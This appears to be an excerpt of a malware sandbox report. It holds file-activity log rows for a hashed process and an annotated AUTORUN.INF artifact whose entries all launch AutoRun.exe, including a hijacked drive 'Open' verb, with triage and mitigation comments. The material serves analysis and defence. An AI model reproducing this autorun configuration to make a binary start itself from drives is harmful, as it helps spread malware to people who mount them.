"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->9614"
420.csv
; Analyst note: this is the content of the AUTORUN.INF artifact listed in this report.
; Every command entry below names the same binary, AutoRun.exe, so each AutoRun
; action or drive context-menu verb defined here resolves to that executable.
; Whether it fires depends on the host's AutoRun policy for the drive type.
; Triage: look for an AUTORUN.INF / AutoRun.exe pair at the root of removable and
; mapped volumes. Mitigation: disable AutoRun by policy (NoDriveTypeAutoRun).
[autorun]
; open= names the program AutoRun starts when the volume is mounted.
open=AutoRun.exe
; shell\1 defines a drive context-menu verb labelled "Open"; its Command runs
; AutoRun.exe instead of opening the drive in Explorer.
shell\1=Open
shell\1\Command=AutoRun.exe
; shell\2 defines a second verb labelled "Browser". The key is written with a
; trailing backslash before '=', unlike shell\1 above - NOTE(review): presumably
; an authoring slip; how Explorer parses this line is not confirmed here.
shell\2\=Browser
shell\2\Command=AutoRun.exe
; shellexecute= hands the same file to ShellExecuteEx as an alternative to open=.
shellexecute=AutoRun.exe
AUTORUN.INF